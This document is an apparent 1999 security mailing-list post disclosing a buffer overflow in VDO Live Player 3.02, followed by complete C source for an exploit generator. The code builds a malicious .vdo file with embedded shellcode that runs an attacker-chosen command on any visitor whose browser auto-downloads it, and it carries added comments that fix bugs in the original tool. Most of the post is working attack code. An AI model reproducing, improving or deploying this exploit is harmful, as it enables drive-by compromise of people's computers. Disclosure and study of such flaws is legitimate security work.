VDO Live Player 3.02 Buffer Overflow
From: shadowpenguin () BACKSECTION NET (UNYUN)
Date: Mon, 13 Dec 1999 06:25:16 +0900
Hello. VDO Live Player overflows when it reads a .vdo file that contains an overly long address. If VDO Live Player is installed on the system and the browser is left at its default settings, a .vdo file is downloaded and executed without any confirmation. So if a client visits a web page that automatically downloads a .vdo file (for example via a META refresh tag) containing attack code, the client machine is compromised by the instructions written in that .vdo file. The buffer pointed to by ESP is too small to hold complex code, but the first line of the .vdo file is stored at the address ecx+0x30, which is long enough to hold the payload. The following sample source code generates a .vdo file that executes an arbitrary command on the visitor's machine. (This code has been tested on Japanese Windows 98 only. Note that the "jmp esp" return address and the LoadLibraryA/GetProcAddress addresses are looked up in kernel32.dll on the machine that builds the file, so the generated file only works against targets with the same kernel32.dll layout.)
-----
/*====================================================================
   ex_vdolive.c / VDO Live Player 3.02 32bit exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin () backsection net)
  =================================================================== */
#include <stdio.h>
#include <string.h>
#include <windows.h>
#define RETADR 90
#define CODE1_OFS 102
#define CODE2_OFS 10
#define MAXBUF1 180
#define MAXBUF2 1500
#define JMPESP_1 0xff
#define JMPESP_2 0xe4
#define NOP 0x90
#define KERNEL_NAME "kernel32.dll"
unsigned char exploit_jmping[100]={
0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03,
0xC3,0xFF,0xE0,0x00};
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,
0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83,
0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83,
0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,
0xFF,0xFF,0x00};
unsigned char
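cmdbuf[200] = "msvcrt.dll.system.exit.";

/*
 * True when any byte of v is 0x00, 0x0a or 0x0d.  Every address this tool
 * embeds ends up inside the first line of a text file that is written with
 * fopen(..., "w"): a 0x00 byte would cut the string short, and a 0x0a byte
 * would both be rewritten as "\r\n" by text mode (shifting every following
 * byte) and end the line early.  The original code only rejected 0x00.
 * Pointer<->unsigned int casts in this file assume a 32-bit build, as the
 * original does.
 */
static int has_bad_byte(unsigned int v)
{
    int shift;

    for (shift = 0; shift < 32; shift += 8) {
        unsigned int b = (v >> shift) & 0xff;
        if (b == 0x00 || b == 0x0a || b == 0x0d)
            return 1;
    }
    return 0;
}

/* Store v as a 4-byte little-endian value at dst (payload addresses). */
static void put_le32(unsigned char *dst, unsigned int v)
{
    dst[0] = v & 0xff;
    dst[1] = (v >> 8) & 0xff;
    dst[2] = (v >> 16) & 0xff;
    dst[3] = (v >> 24) & 0xff;
}

/*
 * Scan [st, ed) for the two-byte sequence c1 c2 and return the address of
 * the first match whose address contains no 0x00/0x0a/0x0d byte, or 0 when
 * there is none.  *(p+1) is read for every p < ed, so the caller must pass
 * an ed that is at least one byte before the end of readable memory.
 */
unsigned int search_mem(unsigned char *st, unsigned char *ed,
                        unsigned char c1, unsigned char c2)
{
    unsigned char *p;

    for (p = st; p < ed; p++) {
        unsigned int adr = (unsigned int)p;

        if (*p != c1 || *(p + 1) != c2)
            continue;
        if (has_bad_byte(adr))
            continue;
        return adr;
    }
    return 0;
}

/*
 * Build the .vdo file: "vdo://" + <buf1> + "/" + <buf2> + "\n".
 *
 * buf1 (MAXBUF1-1 bytes): NOP sled with the "jmp esp" address at RETADR and
 * the short trampoline (exploit_jmping) at CODE1_OFS.
 * buf2 (MAXBUF2-1 bytes): NOP sled with the real payload (exploit_code +
 * "msvcrt.dll.system.exit.<command>") at CODE2_OFS.  The payload resolves
 * system() and exit() through LoadLibraryA/GetProcAddress, whose addresses
 * are patched into it at offsets 0x0d, 0x21 and 0x35; the command length is
 * patched into the imm8 of an "add ebx, imm8" at offset 0x41.
 *
 * argv[1] is the output file name, argv[2] the command to run on the victim.
 * Returns 0 on success, 1 on any error (usage, lookup or I/O failure).
 *
 * Fixes relative to the original: argc is checked for both arguments (argv[2]
 * was dereferenced with only one), the command length is bounded so the two
 * fixed 200-byte arrays cannot overflow and the imm8 stays positive, the
 * NUL terminators are written inside buf1/buf2 (the original wrote
 * buf1[MAXBUF1] and buf2[MAXBUF2], one past each array), API lookups are
 * checked, and the output file is closed.
 */
int main(int argc, char *argv[])
{
    static unsigned char buf1[MAXBUF1], buf2[MAXBUF2];
    MEMORY_BASIC_INFORMATION meminfo;
    HMODULE kernel;
    unsigned int retadr, p1, p2;
    size_t cmdlen, room;
    FILE *fp;

    if (argc < 3) {
        printf("usage: %s FileName Command\n", argv[0]);
        return 1;
    }

    /*
     * The command is appended to cmdbuf and then, together with cmdbuf, to
     * exploit_code (both 200-byte arrays); the tighter bound is exploit_code.
     * Its length is also stored as a sign-extended imm8, so it must be < 0x80.
     */
    cmdlen = strlen(argv[2]);
    room = sizeof(exploit_code) - strlen((char *)exploit_code)
           - strlen((char *)cmdbuf) - 1;
    if (room > 0x7f)
        room = 0x7f;
    if (cmdlen > room) {
        printf("Command is too long (max %u bytes)\n", (unsigned)room);
        return 1;
    }

    kernel = LoadLibrary(KERNEL_NAME);
    if (kernel == NULL) {
        printf("Can not find %s\n", KERNEL_NAME);
        return 1;
    }
    if (VirtualQuery((void *)kernel, &meminfo, sizeof meminfo) == 0) {
        printf("Can not query %s\n", KERNEL_NAME);
        return 1;
    }

    /*
     * Look for "jmp esp" (ff e4) in the first region of kernel32.dll.  The
     * end pointer stops one byte early so the two-byte compare never reads
     * past the region.
     */
    retadr = search_mem((unsigned char *)kernel,
                        (unsigned char *)kernel + meminfo.RegionSize - 1,
                        JMPESP_1, JMPESP_2);
    if (retadr == 0) {
        printf("Can not find codes which are used by this exploit.\n");
        return 1;
    }
    printf("RETADR : %x\n", retadr);

    p1 = (unsigned int)GetProcAddress(kernel, "LoadLibraryA");
    p2 = (unsigned int)GetProcAddress(kernel, "GetProcAddress");
    if (p1 == 0 || p2 == 0) {
        printf("Can not resolve LoadLibraryA / GetProcAddress\n");
        return 1;
    }
    /* These are copied with strlen()-based calls and end up in the same
     * text line as the return address, so the same byte rules apply. */
    if (has_bad_byte(p1) || has_bad_byte(p2)) {
        printf("API address contains a 0x00/0x0a/0x0d byte; can not embed it\n");
        return 1;
    }
    printf("LoadLibrary Address : %x\n", p1);
    printf("GetProcAddress Address : %x\n", p2);

    /* First line part: MAXBUF1-1 NOPs, NUL-terminated inside the array. */
    memset(buf1, NOP, MAXBUF1 - 1);
    buf1[MAXBUF1 - 1] = 0;
    memcpy(buf1, "vdo://", 6);
    put_le32(buf1 + RETADR, retadr);
    memcpy(buf1 + CODE1_OFS, exploit_jmping, strlen((char *)exploit_jmping));

    /* Payload: shellcode, then the DLL/function names and the command. */
    strcat((char *)cmdbuf, argv[2]);
    strcat((char *)exploit_code, (char *)cmdbuf);
    put_le32(exploit_code + 0x0d, p1);
    put_le32(exploit_code + 0x21, p2);
    put_le32(exploit_code + 0x35, p2);
    exploit_code[0x41] = (unsigned char)cmdlen;

    /* Second part: MAXBUF2-1 NOPs with the payload at CODE2_OFS (the payload
     * is at most 199 bytes, so it always fits). */
    memset(buf2, NOP, MAXBUF2 - 1);
    buf2[MAXBUF2 - 1] = 0;
    memcpy(buf2 + CODE2_OFS, exploit_code, strlen((char *)exploit_code));

    /* "w" as in the original: on Windows this is text mode, so the trailing
     * '\n' is written as "\r\n"; no payload byte may be 0x0a (see above). */
    fp = fopen(argv[1], "w");
    if (fp == NULL) {
        printf("Can not create '%s'\n", argv[1]);
        return 1;
    }
    fprintf(fp, "%s/%s\n", buf1, buf2);
    if (fclose(fp) != 0) {
        printf("Can not write '%s'\n", argv[1]);
        return 1;
    }
    printf("File '%s' is created.\n", argv[1]);
    return 0;
}
-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
  shadowpenguin () backsection net (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ]
  unyun () eEye com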